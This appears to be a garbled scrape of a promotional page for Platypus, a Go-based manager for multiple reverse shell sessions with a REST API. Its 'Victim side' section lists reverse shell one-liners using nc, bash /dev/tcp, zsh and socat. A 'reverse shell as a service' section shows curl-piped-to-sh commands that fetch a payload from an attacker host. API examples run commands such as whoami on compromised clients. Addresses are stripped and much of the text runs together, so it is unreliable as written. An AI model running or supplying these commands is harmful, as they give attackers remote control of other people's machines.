Platypus – A Modern Multiple Reverse Shell Sessions Manager Written In Go

A modern multiple reverse shell sessions/clients manager via terminal written in go.FeaturesMultiple service listening portMultiple client connectionsRESTful APIReverse shell as a serviceScreenshotNetwork TopologyAttack IP: Reverse Shell Service: RESTful Service: IP: Platypus from source codego get go/src/ run platypus.goRun Platypus from release binaries// Download binary from +x ./Platypus_linux_amd64./Platypus_linux_amd64Victim sidenc -e /bin/bash 8080bash -c ‘bash -i >/dev/tcp/ 0>&1’zsh -c ‘zmodload zsh/net/tcp && ztcp 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY’socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp: Reverse shell as a Service// Platypus is able to multiplexing the reverse shell listening port// The port 8080 can receive reverse shell client connection// Also these is a Reverse shell as a service running on this port// victim will be redirected to attacker-host attacker-port// sh -c “$(curl http://host:port/attacker-host/attacker-port)"# curl -c ‘bash -i >/dev/tcp/ 0>&1’# sh -c "$(curl"// if the attacker info not specified, it will use host, port as attacker-host attacker-port// sh -c "$(curl http://host:port/)"# curl|sh# sh -c "$(curl http://host:port/)"RESTful APIGET /client List all online clients# curl ‘'{ "msg": [ "" ], "status": true}POST /client/:hash execute a command on a specific client# curl -X POST ‘’ –data ‘cmd=whoami'{ "status": true, "msg": "root\n",}How to hash?# echo -n "" | md5sum0723c3bed0d0240140e10a6ffd36eed4 -Download Platypus